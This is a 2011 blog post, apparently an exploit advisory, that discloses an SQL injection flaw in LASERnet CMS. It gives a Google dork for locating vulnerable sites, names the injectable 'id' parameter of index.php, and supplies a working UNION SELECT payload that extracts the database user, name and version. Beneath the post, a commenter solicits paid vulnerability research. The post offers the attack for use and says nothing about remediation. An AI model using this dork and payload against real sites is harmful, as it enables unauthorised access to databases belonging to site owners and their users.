LASERnet CMS Vulnerable to SQL Injection ~ Random stuff by yappare

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

on August 08, 2011 in Security, SQLi 1 comment

Title : LASERnet CMS Vulnerable to SQL Injection
Vendor : http://cms.lasernet.gr/index.php?lang=en
Dork : intext:"Powered by Lasernet"
Category: WebApps

http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+

thanks,
-p0pc0rn-

john said...: Hey. Great find, seriously man. It's easy to find web app bugs but this is quite a discovery.

If you are interested in getting paid for your vulnerability research (as in, we pay for $x for SQL injection, xss, and remote code execution.), please send me an e-mail: john.martinelli@redlevel.org; August 9, 2011 at 3:01 AM

Random stuff by yappare

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

1 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories